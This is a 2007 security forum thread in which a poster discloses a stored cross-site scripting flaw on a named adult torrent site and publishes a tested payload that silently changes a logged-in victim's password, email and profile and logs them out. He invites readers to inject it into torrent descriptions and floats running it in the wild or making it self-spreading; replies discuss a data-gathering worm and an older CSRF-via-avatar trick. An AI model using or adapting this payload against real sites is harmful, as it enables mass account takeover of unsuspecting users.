Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
XPSS - fallen empornium
Posted by: Anonymous User
Date: January 19, 2007 03:34PM

Hi!

XPSS? Cross Porn Site Scripting! Any of you guys know the empornium? Sazaraki's old place? I took some checks on that site and found interesting stuff. The facts:

Users: 1,001,188 (time of post)
Torrents: 31,732 (just the good stuff)

Anyone can create an account - no invitations or restrictions. Users can upload torrents and stuff and share tons of porn day by day.

Good news 'til now. The bad news is, users with a certain rank can post torrent descriptions with html content. unfiltered html. anything. globally persistent XPSS (one can buy such a rank for 5$ or by having 100GB uploaded) ;)
I played around a little and tried out what would be possible. After some hours of work i had a full working wannabe-worm. A little script snippet which can be posted in above mentioned torrent description. Source will follow later...

Once executed the script by now does not very much - it just loads jQuery (I am lazy) and creates an AJAX request to the 'profileedit.php' with some parameters like imagelinks to weird stallowned pictures and a new password. A new password!
So posting a torrent where 1.000 ppl would klick on would definetly kick any of those klickers (except the noscript dudes) off this portal forever. password change combined with a logout csrf of the profile-page rocks...

ok - the sources for this scenario are written and tested (on my own profile with a superold torrent of mine - youth...) and they work. after that i thought about making a request to the mytorrents-page (xhr), filter out the torrent ids (7 digit number) and send requests to change the torrent info(s) of the logged in user and inject the malicious code to spread the word. but i didn't code that - would be beyond proving the concept.

So i registered at their bb and wrote a post abut the issue in short form like "vulnerability, xss worm, high danger, no commercial interest, offer fixing help" etc. i am such a good boy.

First answer was dumbass, second the admins would take best care of the portal and it could just be a false alert from my desktop firewall. yeah. my desktopfirewal - i was so naive... Some hours later the thread was deleted by a mod or an admin. No PMs, no email, nothing. I don't wanna sound frustrated but i am feeling a mixture of amusement and lack of understanding.

Well, here we go for the sources- inject this in your torrent and you have the above mentioned effect.

<script type="text/javascript" src="http://jquery.com/src/jquery-latest.pack.js"></script>
<script type="text/javascript">

$(document).ready(function(){

$.ajax({
type: "POST",
url: "http://empornium.us/takeprofedit.php",
data: "acceptpms=no&pmnotif=no&avatar=http://img150.imageshack.us/img150/3060/stallowned5wk.jpg&info=<img src='http://empornium.us/logout.php'><img src='http://www.hfstival.com/gallery/albums/userpics/13764/stallowned.jpg' style='position:absolute;top:0px;left:0px;'>&email=stall@owned.org&chpassword=123456&passagain=123456",
success: function(msg){
alert( "Loading Complete..." );
}
});

});

</script>


I don't know if it would be appropriate to run this thing in the wild - modified or not. but on the other hand a measurement like changing the victims profile to "you've been hacked, your new password is 123456 - PM the admin to fix this hole!" would open some eyes!?


What do you think?

Greetings,
.mario

p.s. some url stuff
http://empornium.us
http://forum.empornium.us

Options: ReplyQuote
Re: XPSS - fallen empornium
Posted by: christ1an
Date: January 19, 2007 03:48PM

Well, this is pretty amusingly to read but you have to agree that there are thousands of websites with these kinds of vulnerability. Hacking them is just an amusement with no further sense, isn't it?

Options: ReplyQuote
Re: XPSS - fallen empornium
Posted by: Anonymous User
Date: January 19, 2007 03:59PM

i agree that there are thousands of sites with vulnerabilities but ignoring the existance of a severe vulnerability wich should be fixed immediately is something else. plus the hole is able to be fixed with ten lines of code at the right place. plus 1.000.000 users - neopets vs. tits? 0:1!

sometimes it's just painful to see a 1M community short before burning down due to pure ignorance of the admins.



Edited 1 time(s). Last edit at 01/19/2007 04:00PM by .mario.

Options: ReplyQuote
Re: XPSS - fallen empornium
Posted by: christ1an
Date: January 19, 2007 04:15PM

Yes, in this point you are perfectly right. I think, these admins you mentioned simply don't have the slightest clue about what actually can be done through such vulnerabilities. They are not interested in the theme and don't care about it but try to administrate a more or less high traffic website. This is, what comes out.

For people like you and me such behaviour is not comprehensible. You are right, painful to see but what can the majority do against this?

Options: ReplyQuote
Re: XPSS - fallen empornium
Posted by: Anonymous User
Date: January 19, 2007 04:24PM

And it continues...

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/local/lsws/DEFAULT/html/doc.php on line 13

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /usr/local/lsws/DEFAULT/html/doc.php on line 16

Warning: Cannot modify header information - headers already sent by (output started at /usr/local/lsws/DEFAULT/html/doc.php:13) in /usr/local/lsws/DEFAULT/html/include/bittorrent.php on line 295

aha, lightspeed webserver, php 4.3.11 (via header info), mysql...

Options: ReplyQuote
Re: XPSS - fallen empornium
Posted by: rsnake
Date: January 19, 2007 05:05PM

While I can't comment on your movie plot directly, WhiteAcid had an interesting idea the other day to build an information gathering worm. Think about the concept of a worm that would tell you everything you wanted to know about the users who visited something. It could gather tons of data that you wouldn't normally have access too. Not something I'd ever do, but interesting plot.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: XPSS - fallen empornium
Posted by: jungsonn
Date: January 20, 2007 02:03PM

Cool stuff and nice that some are doing research on those worms, interested to see what you come up with based on this info. I do believe that that whole torrent system included their trackers are vulnerable in a certain way, and indeed pretty scary if it's global.

But your exmaple is this a real world thingy? can't make that up from your story.

Options: ReplyQuote
Re: XPSS - fallen empornium
Posted by: m1n3
Date: January 20, 2007 07:57PM

The site is based on TBsource which is a swiss cheese when it comes to XSS (atleast the unpatched versions).
At older versions you could even set your avatar to
hxxp://example.com/takeprofedit.php?email=blabla@bla.bla
and it would change peoples mail used to recover passwords :P
So that site probaly got more dire issues than XSS ;)



Edited 1 time(s). Last edit at 01/20/2007 08:04PM by m1n3.

Options: ReplyQuote
Re: XPSS - fallen empornium
Posted by: Anonymous User
Date: January 21, 2007 01:11PM

@jungsonn: no movie plot - real thing ;)

@m1n3: That avatar thing doesn't work anymore but the GXSS is bad enough - btw i discovered my thread in the empornium forum - they renamed and censored it but it is still there...

http://forums.empornium.us/viewtopic.php?t=75867

Options: ReplyQuote
Re: XPSS - fallen empornium
Posted by: hackathology
Date: August 21, 2007 08:01AM

hey Rsnake, has that worm being developed by whiteacid already?

http://hackathology.blogspot.com

Options: ReplyQuote
Re: XPSS - fallen empornium
Posted by: WhiteAcid
Date: August 21, 2007 08:38AM

Can't say I have, also I seem to have forgotten what brilliant idea I had :p
Perhaps if you search my posts from a few days before rsnake made that post you'll find something.

I did the search myself:
[url=Fun Ideas for a MySpace Worm]http://sla.ckers.org/forum/read.php?3,5382,5385#msg-5385[/url]

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-[url=http://www.whiteacid.org]WhiteAcid[/url] - your friendly, very lazy, web developer

Options: ReplyQuote
Re: XPSS - fallen empornium
Posted by: hackathology
Date: August 24, 2007 10:19PM

thanks WhiteAcid

http://hackathology.blogspot.com

Options: ReplyQuote


Sorry, only registered users may post in this forum.